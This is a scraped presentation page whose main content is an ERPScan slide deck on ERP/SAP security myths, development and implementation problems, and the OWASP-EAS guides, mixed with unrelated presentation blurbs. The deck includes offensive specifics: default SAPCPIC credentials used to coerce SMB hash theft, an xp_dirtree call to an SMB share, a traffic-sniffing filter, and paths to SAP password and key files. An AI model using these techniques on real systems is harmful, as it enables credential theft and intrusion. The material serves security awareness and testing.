All business processes are generally contained in ERP systems. Any information an attacker might want is stored in the company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. Industrial espionage, sabotage and fraud or insider embezzlement may be very effective if targeted at the victim’s ERP system and cause significant damage to the business.
The presentation describes the specificity of ERP pentesting and focuses on SAP NetWeaver JAVA and Oracle PeopleSoft pentesting.
Practical SAP pentesting (B-Sides San Paulo)ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor with more than 250000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at B-Sides Conference 2014 (San Paulo) is a practical SAP pentesting guide.
Forgotten world - Corporate Business Application SystemsERPScan
This document discusses penetration testing of enterprise resource planning (ERP) systems. It notes that ERP systems are complex, mission-critical applications that contain sensitive business and financial data. Penetration testing ERP systems requires in-depth knowledge of business processes, custom implementations, and various operating systems, databases, and hardware platforms used. The goal is to identify risks like data exposure or business disruption, not just gaining shell access. Exploits also need to be carefully adapted to avoid unintended impacts to the system.
Zero Trust And Best Practices for Securing Endpoint Apps on May 24th 2021Teemu Tiainen
The great cyber security expert Sami Laiho returned as a keynote speaker with the theme of Zero Trust, but this time from the point of view of securing endpoint applications.
Sami Laiho is an internationally renowned and recognized specialist in access rights and endpoint security. In this webinar, Laiho and Centero's Juha Haapsaari discussed the Zero Trust model and securing endpoint applications – even in environments of over 100,000 workstations.
These are some of the themes we covered:
• How to ease your workload with allow-listing.
• Is allow-listing difficult? (A hint: it is not.)
• Implementing AppLocker to trim down your application portfolio.
• Restricting admin rights to control your IT environment.
• Managing and updating applications after allow-listing operations.
Zero Trust is a new paradigm for cyber security in organizations. Modern IT environments are complex by nature, and both users and devices are constantly on the move. Traditional methods are not sufficient to properly secure this kind of environment, and that’s where Zero Trust comes in.
Some of the most famous information breaches over the past few years have been a result of entry through embedded and IoT system environments. Often these breaches are a result of unexpected system architecture and service connectivity on the network that allows the hacker to enter through an embedded device and make their way to the financial or corporate servers. Experts in embedded security discuss key security issues for embedded systems and how to address them.
How to Protect Your Oracle Database from HackersJeff Kayser
Secure your databases! It's where all the juicy information is, right? You know that, and hackers know that. Securing an Oracle database is journey, and you need to take the first step. Come see how you can protect your Oracle Database from hackers
Securing Systems - Still Crazy After All These YearsAdrian Sanabria
This document discusses the ongoing challenges of securing systems and networks. It notes that while cybersecurity basics like asset discovery, vulnerability management, and hardening are important, they are also very difficult tasks given the complexity of modern IT environments. The constant evolution of threats, emerging technologies, and lack of standardized frameworks add to these challenges. However, taking a perspective focused on resilience over perfection, prioritizing the highest risks, and learning from breaches can help tackle security issues in a pragmatic way. The presentation provides strategies for discovery assets, managing vulnerabilities, and hardening systems effectively.
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirementsOlivier DASINI
MySQL Enterprise Transparent Data Encryption (TDE) protects your critical data by enabling data-at-rest encryption in the database. It protects the privacy of your information, prevents data breaches and helps meet regulatory requirements including the Payment Card Industry Data Security Standard (PCI DSS), Health Insurance Portability and Accountability Act (HIPAA) and numerous others.
MySQL Enterprise Audit provides an easy to use, policy-based auditing solution that helps organizations implement stronger security controls and satisfy regulatory compliance.
As more sensitive data is collected, stored and used online, database auditing becomes an essential component of any security strategy. To guard against the misuse of information, popular compliance regulations including HIPAA, Sarbanes-Oxley, and the PCI Data Security Standard require organizations to track access to information.
MySQL Enterprise Firewall guards against cyber security threats by providing real-time protection against database specific attacks. Any application that has user-supplied input, such as login and personal information fields is at risk. Database attacks don't just come from applications. Data breaches can come from many sources including SQL virus attacks or from employee misuse. Successful attacks can quickly steal millions of customer records containing personal information, credit card, financial, healthcare or other valuable data.
MySQL Enterprise Masking and De-identification provides an easy to use, built-in database solution to help organizations protect sensitive data from unauthorized uses by hiding and replacing real values with substitutes.
MySQL Enterprise Edition provides ready to use external authentication modules to easily integrate existing security infrastructures, including Linux Pluggable Authentication Modules (PAM) and Windows Active Directory.
The document discusses security issues related to SAP solutions and introduces ERPScan as an innovative product to help address these issues. It notes that over 2500 security notes have been released for SAP, highlighting growing threats. ERPScan provides integrated assessment of application platform security, ABAP code security, and business logic security. It can monitor SAP servers for vulnerabilities, misconfigurations, critical authorizations, and compliance with standards. The system aims to help automate security checks and reduce costs associated with SAP security problems.
Brighttalk understanding the promise of sde - finalAndrew White
Mr. White has 15 years of experience designing and managing systems monitoring and event management software. He previously led monitoring organizations at a Fortune 100 company and consulted for various organizations. He is now a cloud and smarter infrastructure specialist at IBM. The document discusses software-defined environments and their promise to increase agility through automation and integration of IT infrastructure.
Oracle PeopleSoft applications are under attacks (Hack in Paris)ERPScan
Oracle is the second largest vendor on the ERP market, and its PeopleSoft is used in more than 7000 companies including about 50 % of Fortune 100. PeopleSoft applications are widespread over the world with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes
1. The document discusses how security is changing with new technologies like cloud computing, DevOps, and agile development. Traditional security practices are no longer effective.
2. It advocates migrating security left in the development process so it is designed into applications from the beginning. This allows for a faster security feedback loop.
3. Security needs to be automated and tested using tools and data platforms. Monitoring and inspecting everything is important for the new dynamic environments. Security decisions and controls are also changing to adapt to these new realities.
Microsoft Power Platform Governance with RunpipeRunpipe
www.runpipe.com
This Slide Deck is designed for anyone responsible for the governance and adoption of Power Apps and Power Automate and Power Bi in a large organisations.
It will list all the features, tools and practices available in the Power Platform to help you monitor, protect and support your data and applications, while also enabling and encouraging innovation from your makers.
It shares top tips and best practice suggestions for governance, security and monitoring, and strategies employed by customers to enable digital transformation with the Power Platform.
Runpipe provides an intuitive platform that brings together security, governance and enablement for multiple Low-Code Platforms, all in one place.
The presentation describes 5 steps you should take to secure your SAP. There are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
This document discusses how Zurich Insurance was able to deliver DevOps style production values and double performance of their Risk Management Platform using PureApplication and UrbanCode Deploy. PureApplication allowed them to create reusable patterns for deploying the solution components. UrbanCode Deploy provided automated deployment of the patterns and management of the environments. Together, PureApplication and UrbanCode Deploy provided a synergetic solution that rapidly and consistently deployed the overall Risk Management Platform, reducing downtime and speeding up computation times.
The document discusses Oracle Solaris 11.4 and how it provides a trusted business platform for modernizing critical applications. It highlights how Oracle Solaris 11.4 allows businesses to leverage existing investments, improve security and capacity, simplify management through integration with popular open source tools, and deploy applications on a modern enterprise UNIX infrastructure.
Learn how HP Fortify On Demand is leveraging Fortify Runtime Protection to protect our own cloud services. See tips and techniques learned from deploying Runtime Protection in the real world, and learn how you can leverage the same technology in your environment without compromising performance or uptime. You’ll come away with tips on deploying, managing, and integrating Fortify Runtime Protection so you can block attacks while providing your developers with line-of-code detail regarding how to close the holes.
Similar to ERP Security. Myths, Problems, Solutions (20)
SAP Mobile infrastructure consists of multiple systems such as SAP Mobile Platform (formerly Sybase Unwired Platform) also SAP Afaria MDM solution, Sybase SQL Anywhere Database, and hundreds of SAP's mobile applications. They even have their own store for mobile apps that can be developed by third parties. This talk highlights how one can hack SAP Mobile.
In this popular platform, we have discovered a lot of typical vulnerabilities - XSS, XXE, hardcoded static encryption keys, and vulnerabilities that are specific to this platform - logic vulnerabilities and privilege escalations. As a result, after compromising the SAP Mobile platform, we demonstrated how to get access to compromised mobile phones.
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...ERPScan
This research includes detailed attack timeline, discovers what kind of vulnerability was exploited and provides the recommendations how to avoid data breaches in SAP systems.
The latest changes to SAP cybersecurity landscapeERPScan
The document discusses cybersecurity risks related to SAP systems. It describes two main risks: 1) Credit card data theft, where a hacker could access tables storing unencrypted credit card data in the SD module and steal the data. 2) Competitive intelligence theft through the SRM module, where a competitor could access bidding information to undercut prices unfairly. The document advocates for stronger configuration controls, access management, and patching to help mitigate these risks.
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPERPScan
This document discusses vulnerabilities in connecting ERP and ICS systems. It notes that while ERP, ICS, and other business systems need to be connected to share information, these connections can be exploited by attackers to infiltrate corporate networks. The document outlines several ways that vulnerabilities in ERP systems, misconfigurations, unnecessary privileges, and system interconnectivity can be leveraged to access sensitive business data or disrupt operations. It emphasizes that securing these connections and monitoring for security issues is critical for business security and continuity.
5 real ways to destroy business by breaking SAP applicationsERPScan
This document discusses security risks related to SAP applications. It describes 5 ways that business applications can be broken into, including espionage, sabotage, and fraud. Specific risks discussed include theft of credit card data from SAP's SD module, and compromise of competitive bidding information from the SRM module. The document advocates for security measures like configuration checks, access controls and code scanning to help defend against attacks.
13 real ways to destroy business by breaking company’s SAP applicationsERPScan
All SAP risks can be divided into three groups: Espionage, Sabotage and Fraud.
The presentation provides a review of 13 most dangerous risks any business may face with. For every risk, there is its type, attack scenario, affected sector, and vulnerable module.
If I want a perfect cyberweapon, I'll target ERP - second editionERPScan
This document discusses security risks associated with enterprise resource planning (ERP) systems like SAP. It begins by noting how critical ERP systems are for large companies and the vast number of customers that major ERP vendors have. It then provides examples of security risks like espionage, sabotage and fraud that can occur in ERP modules like materials management. Specific vulnerabilities that could allow manipulating materials prices or blocking materials posting are described. The document emphasizes that while examples focus on SAP, the risks apply to all major ERP systems.
This document discusses security vulnerabilities in SAP systems. It notes that many SAP systems have non-web services exposed that could allow remote access. It also details how passwords are sometimes stored insecurely in SAP shortcuts, log files, and database tables, allowing attackers to gain access to systems and steal sensitive data. The document recommends steps companies can take to prevent such vulnerabilities, like patching systems, not storing passwords in shortcuts, and using more secure authentication methods.
If I want a perfect cyberweapon, I'll target ERPERPScan
ERP Systems are widely used in Oil and Gas, Manufacturing, Logistics, Financials
Nuclear, Retail, Telecommunication and other industries. All mission-critical data are stored in ERP Systems, so attacks against them may result in Espionage, Sabotage and Fraud.
The presentation gives examples of real and potential attacks and describes important details of ERP Security.
Alexander Polyakov, CTO of ERPScan, presented this talk at RSA Conference Europe 2013.
SAP is the most popular business application with more than two hundred forty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. However, in ERP systems, all business processes are performed, all critical information is stored like finances, HR, clients. Not to care about the security of this data is not very sensible.
SAP NetWeaver Development Infrastructure is a complex item. It combines the characteristics and advantages of local development environments with a server-based development landscape. All this stuff centrally provides opportunities to support the software, implement new features, manage lifecycle of a product, etc. So, the main aim is to control deployment of components in the system landscape in a standardized manner.
The key component in DI scheme is Software Deployment Manager (SDM). It is directly related to the production systems, that is why it is so critical.
The presentation describes special features of SDM and provides several SDM attack scenarios along with the ways to prevent them.
The presentation describes 5 steps you should take to secure your SAP. There are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
This document discusses OLAP and MDX injection attacks. It provides an overview of OLAP and how MDX is used to query multidimensional data cubes. The document then explains how MDX injections can be used to expose sensitive data by manipulating MDX queries. Specific techniques are described, such as injecting into the WITH or SELECT clauses of an MDX query to conduct partial data retrieval or blind injections.
The document discusses security issues related to SAP systems and portals. It notes that while SAP is widely used, security vulnerabilities are common due to lack of logging and exposure of services. The document emphasizes that SAP portals deserve attention as they provide a common entry point for attackers and link to other critical systems. Proper monitoring of portals and exposed services is needed to detect attacks and unauthorized access.
SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored.
The presentation describes how SAP Portal works and kinds of attacks it can be exposed to.
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineERPScan
SAP is the most popular business application with more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored like finances, HR, clients. Not to care about the security of this data is not very sensible.
The presentation provides examples of simple and advanced attacks along with ways to avoid them.
Takashi Kobayashi and Hironori Washizaki, "SWEBOK Guide and Future of SE Education," First International Symposium on the Future of Software Engineering (FUSE), June 3-6, 2024, Okinawa, Japan
Measures in SQL (SIGMOD 2024, Santiago, Chile)Julian Hyde
SQL has attained widespread adoption, but Business Intelligence tools still use their own higher level languages based upon a multidimensional paradigm. Composable calculations are what is missing from SQL, and we propose a new kind of column, called a measure, that attaches a calculation to a table. Like regular tables, tables with measures are composable and closed when used in queries.
SQL-with-measures has the power, conciseness and reusability of multidimensional languages but retains SQL semantics. Measure invocations can be expanded in place to simple, clear SQL.
To define the evaluation semantics for measures, we introduce context-sensitive expressions (a way to evaluate multidimensional expressions that is consistent with existing SQL semantics), a concept called evaluation context, and several operations for setting and modifying the evaluation context.
A talk at SIGMOD, June 9–15, 2024, Santiago, Chile
Authors: Julian Hyde (Google) and John Fremlin (Google)
https://doi.org/10.1145/3626246.3653374
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...Crescat
Crescat is industry-trusted event management software, built by event professionals for event professionals. Founded in 2017, we have three key products tailored for the live event industry.
Crescat Event for concert promoters and event agencies. Crescat Venue for music venues, conference centers, wedding venues, concert halls and more. And Crescat Festival for festivals, conferences and complex events.
With a wide range of popular features such as event scheduling, shift management, volunteer and crew coordination, artist booking and much more, Crescat is designed for customisation and ease-of-use.
Over 125,000 events have been planned in Crescat and with hundreds of customers of all shapes and sizes, from boutique event agencies through to international concert promoters, Crescat is rigged for success. What's more, we highly value feedback from our users and we are constantly improving our software with updates, new features and improvements.
If you plan events, run a venue or produce festivals and you're looking for ways to make your life easier, then we have a solution for you. Try our software for free or schedule a no-obligation demo with one of our product specialists today at crescat.io
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j
Dr. Jesús Barrasa, Head of Solutions Architecture for EMEA, Neo4j
Découvrez les dernières innovations de Neo4j, et notamment les dernières intégrations cloud et les améliorations produits qui font de Neo4j un choix essentiel pour les développeurs qui créent des applications avec des données interconnectées et de l’IA générative.
Hand Rolled Applicative User ValidationCode KataPhilip Schwarz
Could you use a simple piece of Scala validation code (granted, a very simplistic one too!) that you can rewrite, now and again, to refresh your basic understanding of Applicative operators <*>, <*, *>?
The goal is not to write perfect code showcasing validation, but rather, to provide a small, rough-and ready exercise to reinforce your muscle-memory.
Despite its grandiose-sounding title, this deck consists of just three slides showing the Scala 3 code to be rewritten whenever the details of the operators begin to fade away.
The code is my rough and ready translation of a Haskell user-validation program found in a book called Finding Success (and Failure) in Haskell - Fall in love with applicative functors.
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
Odoo ERP software
Odoo ERP software, a leading open-source software for Enterprise Resource Planning (ERP) and business management, has recently launched its latest version, Odoo 17 Community Edition. This update introduces a range of new features and enhancements designed to streamline business operations and support growth.
The Odoo Community serves as a cost-free edition within the Odoo suite of ERP systems. Tailored to accommodate the standard needs of business operations, it provides a robust platform suitable for organisations of different sizes and business sectors. Within the Odoo Community Edition, users can access a variety of essential features and services essential for managing day-to-day tasks efficiently.
This blog presents a detailed overview of the features available within the Odoo 17 Community edition, and the differences between Odoo 17 community and enterprise editions, aiming to equip you with the necessary information to make an informed decision about its suitability for your business.
Artificia Intellicence and XPath Extension FunctionsOctavian Nadolu
The purpose of this presentation is to provide an overview of how you can use AI from XSLT, XQuery, Schematron, or XML Refactoring operations, the potential benefits of using AI, and some of the challenges we face.
Atelier - Innover avec l’IA Générative et les graphes de connaissancesNeo4j
Atelier - Innover avec l’IA Générative et les graphes de connaissances
Allez au-delà du battage médiatique autour de l’IA et découvrez des techniques pratiques pour utiliser l’IA de manière responsable à travers les données de votre organisation. Explorez comment utiliser les graphes de connaissances pour augmenter la précision, la transparence et la capacité d’explication dans les systèmes d’IA générative. Vous partirez avec une expérience pratique combinant les relations entre les données et les LLM pour apporter du contexte spécifique à votre domaine et améliorer votre raisonnement.
Amenez votre ordinateur portable et nous vous guiderons sur la mise en place de votre propre pile d’IA générative, en vous fournissant des exemples pratiques et codés pour démarrer en quelques minutes.
OpenMetadata Community Meeting - 5th June 2024OpenMetadata
The OpenMetadata Community Meeting was held on June 5th, 2024. In this meeting, we discussed about the data quality capabilities that are integrated with the Incident Manager, providing a complete solution to handle your data observability needs. Watch the end-to-end demo of the data quality features.
* How to run your own data quality framework
* What is the performance impact of running data quality frameworks
* How to run the test cases in your own ETL pipelines
* How the Incident Manager is integrated
* Get notified with alerts when test cases fail
Watch the meeting recording here - https://www.youtube.com/watch?v=UbNOje0kf6E
SMS API Integration in Saudi Arabia| Best SMS API ServiceYara Milbes
Discover the benefits and implementation of SMS API integration in the UAE and Middle East. This comprehensive guide covers the importance of SMS messaging APIs, the advantages of bulk SMS APIs, and real-world case studies. Learn how CEQUENS, a leader in communication solutions, can help your business enhance customer engagement and streamline operations with innovative CPaaS, reliable SMS APIs, and omnichannel solutions, including WhatsApp Business. Perfect for businesses seeking to optimize their communication strategies in the digital age.
What is Master Data Management by PiLog Groupaymanquadri279
PiLog Group's Master Data Record Manager (MDRM) is a sophisticated enterprise solution designed to ensure data accuracy, consistency, and governance across various business functions. MDRM integrates advanced data management technologies to cleanse, classify, and standardize master data, thereby enhancing data quality and operational efficiency.
SOCRadar's Aviation Industry Q1 Incident Report is out now!
The aviation industry has always been a prime target for cybercriminals due to its critical infrastructure and high stakes. In the first quarter of 2024, the sector faced an alarming surge in cybersecurity threats, revealing its vulnerabilities and the relentless sophistication of cyber attackers.
SOCRadar’s Aviation Industry, Quarterly Incident Report, provides an in-depth analysis of these threats, detected and examined through our extensive monitoring of hacker forums, Telegram channels, and dark web platforms.
E-commerce Application Development Company.pdfHornet Dynamics
Your business can reach new heights with our assistance as we design solutions that are specifically appropriate for your goals and vision. Our eCommerce application solutions can digitally coordinate all retail operations processes to meet the demands of the marketplace while maintaining business continuity.
1. Invest
in
security
to
secure
investments
ERP
Security.
Myths,
Problems,
Solu6ons
Alexander
Polyakov
CTO
ERPScan
2. About
ERPScan
• The
only
360-‐degree
SAP
Security
solu8on
-‐
ERPScan
Security
Monitoring
Suite
for
SAP
• Leader
by
the
number
of
acknowledgements
from
SAP
(
150+
)
• 60+
presenta6ons
key
security
conferences
worldwide
• 25
Awards
and
nomina6ons
• Research
team
-‐
20
experts
with
experience
in
different
areas
of
security
• Headquarters
in
Palo
Alto
(US)
and
Amsterdam
(EU)
2
3. Intro
• ERP
-‐
Enterprise
resource
planning
is
an
integrated
computer-‐based
system
used
to
manage
internal
and
external
resources
including
tangible
assets,
financial
resources,
materials,
and
human
resource
– Wikipedia
3
4. Intro
Business
applica8ons
like
ERP,
CRM,
SRM
and
others
are
one
of
the
major
topics
within
the
scope
of
computer
security
as
these
applica8ons
store
business
data
and
any
vulnerability
in
these
applica8ons
can
cause
a
significant
monetary
loss
or
even
stoppage
of
business.
4
5. Main
Problems
in
ERP
Security
Complex
structure
(complexity
kills
security)
Different
vulnerabili6es
At
all
the
levels
Inside
a
company
(closed
world)
Rarely
updated
administrators
are
scared
they
can
be
broken
during
updates
5
6. Myths
Myth
1:
Business
applica8ons
are
only
available
internally
what
means
no
threat
from
the
Internet
Myth
2:
ERP
security
is
a
vendor’s
problem
Myth
3:
Business
applica8on
internals
are
very
specific
and
are
not
known
for
hackers
Myth
4
ERP
security
is
all
about
SOD
6
7. Myth
1:
Business
Applica6ons
are
Only
Available
Internally
• Top
management
point
of
view
– This
myth
is
popular
for
internal
corporate
systems
and
people
think
that
these
systems
are
only
available
internally
• Real
life
– Yes
maybe
at
the
mainframe
era
with
SAP
R/2
and
in
some
implementa8ons
of
R/3
you
can
use
SAP
only
internally
but
not
now
in
the
era
of
global
communica8ons.
As
a
minimum
you
need
the
integra8on
with:
o Another
offices
o Customers
and
suppliers
o For
SAP
systems
you
need
connec8on
with
SAP
network
Even
if
you
do
not
have
direct
connec4on
there
are
user
worksta4ons
connected
to
the
internet
7
8. Myth
1:
Business
Applica6ons
are
Only
Available
Internally
It
is
necessary
to
bring
together
people
who
understand
ERP
security,
and
people
who
understand
the
Internet,
e-‐mail
and
security
of
WEB-‐services
8
10. Myth
2.
ERP
Security
is
a
Vendor’s
Problem
From
the
point
of
law:
• Vendor
is
NOT
responsible
for
the
vulnerabili6es
in
their
products
• Business
applica6on
security
is
the
problem
of
a
Client
10
11. Myth
2.
ERP
Security
is
a
Vendor’s
Problem
{
{Vendor
problems
Client
problems
1. Program
Errors
2. Architecture
errors
3. Implementa8on
architecture
errors
4. Defaults
/
Misconfigura8ons
5. Human
factor
6. Patch
management
7. Policies/
processes
/
etc
From
technical
point:
There
can
be
so
many
fails
even
if
the
soware
is
secure
11
12. Myth
3.
Business
Applica6on
Internals
are
not
Known
to
Hackers
Current
point
of
view:
• Mostly
installed
inside
a
company
• Not
so
popular
among
hackers
like
Windows
or
Apple
products
• Closed
world
• Security
through
obscurity
12
13. Myth
3.
Business
Applica6on
Internals
are
not
Known
to
Hackers
Real
life:
• Popular
products
are
on
the
a_ack
by
hackers,
and
becoming
more
and
more
secure
• Business
applica8ons
WERE
closed
but
over
the
last
5
years
they
have
became
more
and
more
popular
on
the
Internet
• And
also
popular
for
hackers
and
researchers
(will
be
shown
in
the
future
sta8s8cs)
• Unfortunately,
their
security
level
is
s8ll
like
3-‐5
years
ago
• Now
they
look
as
a
defenseless
child
in
a
big
city
13
14. Myth
4.
ERP
Security
is
All
about
SOD
Current
point
of
view:
• Many
people
especially
ERP
people
think
that
security
is
all
about
SOD
Real
life:
• Making
AD
access
control
dont
give
you
secure
infrastructure
• Buying
new
engine
for
car
every
year
will
not
help
you
if
you
simply
puncture
a
wheel
• And
also
remind
Sachar
Paulus
interview
that
says:
“other
threat
comes
from
people
connec4ng
their
ERP
systems
to
the
Internet”
14
15. Myth
4.
ERP
Security
is
All
about
SOD
ERP
system
with
secure
SOD
and
nothing
else
it
is
much
of
spending
all
money
on
video
systems,
biometric
access
control
and
leaving
the
back
door
open
for
housekeepers
15
16. Myth
4.
ERP
Security
is
All
about
SOD
1 Lack
of
patch
management CRITICAL REMOTE
2 Default
passwords
for
applica8on
access CRITICAL REMOTE
3 SOD
conflicts CRITICAL LOCAL
4 Unnecessary
enabled
applica8on
features
HIGH REMOTE
5 Open
remote
management
interfaces HIGH REMOTE
6 Lack
of
password
lockout/complexity
checks MEDIUM REMOTE
7 Insecure
op8ons
MEDIUM REMOTE
8 Unencrypted
communica8ons HIGH REMOTE
9 Insecure
trust
rela8ons MEDIUM LOCAL
10 Guest
access MEDIUM REMOTE
Top
10
Applica6on
Implementa6on
Problems
(OWASP-‐EAS
EASAI
Top
10)
16
19. Development
Problems
SAP
OWN
TECHNOLOGIES
(ABAP/BSP)
JAVA
(jsp/servlets/ejb/j2ee/rmi)
WEB
(html/js)
Other
(C/wbs/sql)
Oracle
OWN
TECHNOLOGIES
(BPEL
/PLSQL)
JAVA
(jsp/servlets/ejb/j2ee/rmi)
WEB
(html/js/cgi)
Other
(C/wbs/sql)
PeopleSo
OWN
TECHNOLOGIES
(Peoplecode/PLSQL)
JAVA
(jsp/servlets/ejb/j2ee/rmi)
WEB
(html/js/cgi)
Other
(C/wbs/sql)
Languages
Technologies
Plaborms
19
20. Implementa6on
Problems
Different
Databases
Different
OS
Different
product
versions
Huge
amount
of
customiza8on
Different
Architecture
20
21. Different
Architecture
• Different
mandates
on
different
instances
on
different
physical
servers
• Can
be
DEV
TEST
or
PROD
• Can
have
different
modules
such
as
SRM/PLM/CRM/ERP
connected
by
different
ways
to
itself
and
other
systems
• Different
DMZ/
terminal
server
installa8ons
• Add
IM/LDAP/AD
and
other
solu8ons
to
our
architecture
• And
even
more
21
22. Different
OS
OS
popularity
for
SAP
Windows
NT
-‐
28%
AIX
-‐
25%
Linux
-‐
19%
SunOS
-‐
13%
HP-‐UX
-‐
11%
OS/400
-‐
4%
22
23. Different
Plaborms
• ABAP
or
JAVA
or
BusinessObjects
• Only
ABAP
Can
be:
- SAP
R/3
4.6
- SAP
R/3
4.7
Entertprise
- SAP
NetWeaver
6.4
- SAP
NetWeaver
7.0
- SAP
NetWeaver
7.2
- SAP
NetWeaver
7.3
- Also
Add-‐ons
- Also
industry
solu8ons
23
24. Great
Amount
of
Customiza6on
• Approximately
about
40-‐60%
of
ERP
are
custom
code
• With
own
vulnerabili8es
• Also
there
can
be
custom
many
custom
items
– Authoriza8on
objects
– Authoriza8ons
– Roles
– Transac8ons
– Programs
– Etc…
If
you
have
customized
the
system
you
must
have
security
solu4ons
customized
that
is
much
more
harder
than
checklist-‐like
solu4ons
24
26. How
to
Make
Secure
ERP
System
in
5
Steps
• Develop
secure
sonware
• Implement
it
securely
• Teach
administrators
• Increase
user
awareness
• Control
the
whole
process
26
27. Introducing
OWASP-‐EAS
• Develop
secure
sonware
– OWASP-‐Enterprise
Business
Applica8on
Security
Vulnerability
Tes8ng
Guide
v0.1
• Implement
it
securely
– Enterprise
Business
Applica8on
Security
Implementa8on
Assessment
Guide
• Teach
administrators
– Our
Trainings
• Increase
user
awareness
– SAP
Security
in
figures
report
• Control
the
whole
process
– Tools
27
28. Introducing
OWASP-‐EAS
• Need
guides
for
developers
and
vulnerability
testers
to
assess
enterprise
applica8ons
• Sources:
– We
have
OWASP
–
good
and
focused
mainly
on
WEB
vulnerabili8es
– We
have
WASC
–
good
but
focused
on
WEB
– We
have
SANS
25
–
good
but
not
about
ERP
– We
have
CWE
–
good
but
too
big
– We
have
OSTMM
–
good
but
focused
on
assessing
systems
not
sonware
– SAP/Oracle
security
guides
–
good
but
too
many
informa8on
• Result:
– OWASP-‐EAS
Enterprise
Business
Applica8on
Security
Vulnerability
Tes8ng
Guide
v.0.1
28
29. Introducing
OWASP-‐EAS
• Analyze
most
popular
vulnerabili8es
in
enterprise
systems
• Create
TOP
10
list
• Collect
informa8on
about
examples,
threats
and
countermeasures
• Release
Guide
• Aner
a
year
go
back
to
step
1
29
32. Examples
XSS
• There
is
an
unlimited
number
of
XSS
in
SAP
• The
latest
one
at
h_p://erpscan.com
Informa6on
Disclosure
• ORACLE
Financials
– /pls/DAD/find_web.ping
– /OA_HTML/jsp/fnd/fndping.jsp
• SAP
Netweaver
– /sap/public/info
32
33. Examples
of
Network
Security
Improper
access
control
/
traversal
(SAP
Netweaver)
• RFC
func8ons
can
be
called
remotely
• You
need
a
user
and
a
password
• ALMOST
ALL
SAP
administrators
do
not
change
the
password
for
user
SAPCPIC
• Using
his
creden8als
we
can
call
the
func6on
that
tries
to
read
the
file
on
our
SMB
share
• Gotcha!
Hashes
are
stolen
33
35. Examples
of
Frontend
Vulnerabili6es
• Buffer
overflow
– Can
be
exploited
to
gain
remote
access
to
user
– Also
format
string
and
memory
corrup8on
– The
latest
one
at
h_p://www.exploit-‐db.com/exploits/14416/
– NEW
vulns
are
being
patched
now.
Soon
at
h_p://erpscan.com/
– Also
other
vulnerable
ERPs
35
36. Examples
of
Frontend
Vulnerabili6es
• Hard-‐coded
passwords
(some
ERPs,
we
don’t
spell
names)
– Very
dangerous
– Fat
client
with
hard-‐coded
passwords
to
database
– Checking
of
access
rights
is
on
the
client
site.
They
are
exploited
to
gain
remote
access
to
user
– Exploited
simply
by
sniffing
database
connec8on
and
direct
connec8on
with
stolen
password
–
As
a
result
we
are
DBA
on
database
36
38. Enterprise
Applica6on
Security
Implementa6on
Assessment
• Build
secure
applica8on
is
not
enough
• Need
to
do
securely
– Install
it
– Configure
it
– Manage
it
38
39. Enterprise
Applica6on
Security
Implementa6on
Assessment
• Analyze
the
most
cri8cal
areas
of
misconfigura8ons
• Group
it
• Create
TOP
10
list
• Collect
informa8on
about
examples,
threats
and
countermeasures
• Release
Guide
• Aner
a
year
go
back
to
step
1
39
42. Examples
of
Network
Security
Capture
SAP
traffic
tcpdump -n -i eth0 'tcp[13] & 3 != 0 and
(( tcp[2:2] >= 3200 tcp[2:2] < 3300) > or 5
( tcp[2:2] >= 3600 tcp[2:2] < > 3700))‘
• Find
a
user
and
decode
the
password.
A
user
has
access
to
XI
system
without
business
data
• Use
the
SM59
transac8on
that
can
show
all
RFC
connec8ons.
There
was
only
one
connec8on
to
HR
system
with
hardcoded
creden8als
found
• Creden8als
were
of
the
remote
RFC
user
created
for
data
exchange
• This
user
called
ALEREMOTE
had
SAP_ALL
privileges
42
44. OS
Vulnerabili6es:
Access
to
Cri6cal
Files
• Database
files
(DATA
+
encrypted
Oracle
and
SAP
passwords)
– /oracle/<DBSID>/sapdata/system_1/system.data1
• SAP
config
files
(encrypted
passwords)
– /usr/sap/<SAPSID>/<Instance
ID>/sec/*
– /usr/sap/<SAPSID>/<Instance
ID>/sec/sapsys.pse
• Configtool
Config
files
(Encrypted
Database
password)
– usrsapDM0SYSglobalsecuritydataSecStope.proper8es
– usrsapDM0SYSglobalsecuritydataSecStope.key
• J2EE
Trace
files
(Plaintext
passwords)
– /usr/sap/<sapsid>/<InstanceID>/j2ee/cluster/dispatcher/log/defaultTrace.
0.trc
• ICM
config
files
(encrypted
password)
– usrsapDM0SYSexeucNTI386icmauth.txt
There
are
many
cri4cal
files
on
SAP
server
that
can
be
used
by
unprivileged
user
to
gain
access
to
SAP
applica4on:
44
46. Examples
of
Database
Vulnerabili6es
• Unnecessary
enabled
services
– Any
database
have
them
by
default
o Oracle
– UTL_FILE,
UTL_HTTP,
UTL_TCP,etc
– MSSQL
o Master..xp_dirtree
‘fakesmbsharee’
